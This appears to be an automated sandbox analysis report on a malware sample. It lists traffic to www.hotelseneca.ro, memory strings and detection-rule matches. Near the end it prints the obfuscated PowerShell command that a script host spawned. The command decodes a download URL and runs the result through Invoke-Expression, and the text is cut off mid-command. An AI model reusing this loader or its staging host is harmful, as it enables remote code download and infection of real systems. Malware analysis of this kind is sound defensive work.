Source: Submited Sample |
Integrated Neural Analysis Model: Matched 95.6% probability |
Source: unknown |
HTTPS traffic detected: 185.181.240.15:443 -> 192.168.2.7:49700 version: TLS 1.2 |
Source: |
Binary string: *on.pdb source: powershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: tem.Core.pdbz' source: powershell.exe, 0000000D.00000002.2539499175.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: tomation.pdbGk source: powershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657e |
Source: Joe Sandbox View |
JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e |
Source: global traffic |
HTTP traffic detected: GET /Perspectivist.snp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.hotelseneca.roConnection: Keep-Alive |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /Perspectivist.snp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.hotelseneca.roConnection: Keep-Alive |
Source: global traffic |
DNS traffic detected: DNS query: Horm5zl_6637.6637.6637.657e |
Source: global traffic |
DNS traffic detected: DNS query: www.hotelseneca.ro |
Source: powershell.exe, 0000000D.00000002.2569380323.0000000007444000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro# |
Source: powershell.exe, 0000000D.00000002.2569380323.00000000073D0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microsoftP |
Source: powershell.exe, 00000004.00000002.1391887473.0000016765994000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://hotelseneca.ro |
Source: powershell.exe, 00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000004.00000002.1391887473.00000167638A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2543840351.00000000049F1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000004.00000002.1391887473.0000016765994000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.hotelseneca.ro |
Source: powershell.exe, 00000004.00000002.1391887473.00000167638A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000000D.00000002.2543840351.00000000049F1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000004.00000002.1391887473.000001676463C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000004.00000002.1391887473.00000167658E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1391887473.0000016763AC7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.hotelseneca.ro |
Source: powershell.exe, 00000004.00000002.1391887473.0000016763AC7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.hotelseneca.ro/Perspectivist.snpP |
Source: powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.hotelseneca.ro/Perspectivist.snpXR |
Source: powershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.hotelseneca.ro/Perspectivist.snpmuim |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49700 -> 443 |
Source: unknown |
HTTPS traffic detected: 185.181.240.15:443 -> 192.168.2.7:49700 version: TLS 1.2 |
Source: amsi64_7400.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_8108.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 8108, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24} |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOF |